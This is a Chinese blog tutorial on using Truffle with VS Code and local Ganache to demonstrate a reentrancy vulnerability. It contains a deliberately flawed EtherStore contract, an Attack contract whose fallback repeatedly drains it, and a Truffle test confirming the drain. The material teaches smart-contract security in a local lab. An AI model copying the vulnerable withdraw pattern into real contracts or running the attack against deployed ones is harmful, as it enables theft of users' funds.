智能合约安全漏洞Truffle工具使用流程，以及钱包合约漏洞攻击示例

后端到全栈到全干

已于 2024-07-09 20:19:59 修改

阅读量558

点赞数 15

文章标签：智能合约安全区块链

于 2024-02-01 01:09:50 首次发布

本文链接：https://blog.csdn.net/weixin_74278203/article/details/135964486

版权

1、前置环境安装

第一步、安装Truffle

首先我们需要先安装好node.js

利用npm 下载Truffle

# win+r 输入cmd打开终端 
npm install -g truffle

第二步、打开vscode 安装插件

插件名：Truffle for VS Code

下载后在vscode打开下载所需的环境

2、truffle使用

第一步、新建文件夹，打开cmd进行初始化

进入终端输入：truffle init

第二步、使用vscode打开该文件进行漏洞测试（下面使用常见的重入攻击漏洞进行示例）

使用vscode打开该文件

一、导入合约

在migrations目录下新建有问题的合约EtherStore.sol和攻击合约Attack.sol

EtherStore.sol

pragma solidity >=0.8.3;
import "./Attack.sol";

contract EtherStore {
    mapping(address => uint) public balances;
    event Balance(uint256);

    function deposit() public payable {
        balances[msg.sender] += msg.value;
        emit Balance(balances[msg.sender]);
    }

    function withdraw() public {
        uint bal = balances[msg.sender];
        require(bal > 0);        

        (bool sent, ) = msg.sender.call{value: bal}("");
        require(sent, "Failed to send Ether");
        
        balances[msg.sender] = 0; 
         
    }

    // Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

Attack.sol

pragma solidity >=0.8.3;
import "./EtherStore.sol";

contract Attack {
    EtherStore public etherStore;

    constructor(address _etherStoreAddress) {
        etherStore = EtherStore(_etherStoreAddress);
    }

    // Fallback is called when EtherStore sends Ether to this contract.
    fallback() external payable {
        if (address(etherStore).balance >= 1) {
            etherStore.withdraw();
        }
    }

    function attack() external payable {
        require(msg.value >= 1);
        etherStore.deposit{value: 1}();
        etherStore.withdraw();
    }

    // Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

二、部署合约

在migrations目录下新建 1_deploy_contract.js(多个迁移文件,开头必须加数字,表明迁移顺序)

1_deploy_contract.js

const EtherStore = artifacts.require("EtherStore");
const Attack = artifacts.require("Attack");
module.exports = async function (deployer, network, accounts) {
    await deployer.deploy(EtherStore);
    const a = await EtherStore.deployed();
    await deployer.deploy(Attack,a.address);
}

然后点进Truffle for vscode插件里，将本地的Ganache进行连接

新建工作区

与本地的Ganache进行连接

然后点开项目的配置文件（truffle-config.js）进行端口修改和sol语言版本修改

然后在vscode的控制台中输入两条指令，如若build目录下出现test.json即成功

1、输入 truffle compile

2、输入truffle migrate

若出现下面截图内容，本地Ganache出现日志则代表部署成功

三、攻击合约脚本

在test目录下新建 1_test.js这个js文件

1_test.js

const EtherStore = artifacts.require("EtherStore");
const Attack = artifacts.require("Attack");

contract("ReEntrancy",async (accounts)=>{
    it("test re-enterancy loophole",async()=>{
        const depositInstance = await EtherStore.deployed();
        const attackInstance = await Attack.deployed();
        await depositInstance.deposit({from:accounts[0],value:1});
        await depositInstance.deposit({from:accounts[1],value:1});
        await attackInstance.attack({from:accounts[2],value:1});
        const balance = await attackInstance.getBalance();
        assert.equal(balance,3,"account[2] should be 3 beacuse of the re-entransy loophole");
        const balanceA = await depositInstance.getBalance();
        assert.equal(balanceA,0,"account[0] should be 3 beacuse of the re-entransy loophole");
    })
})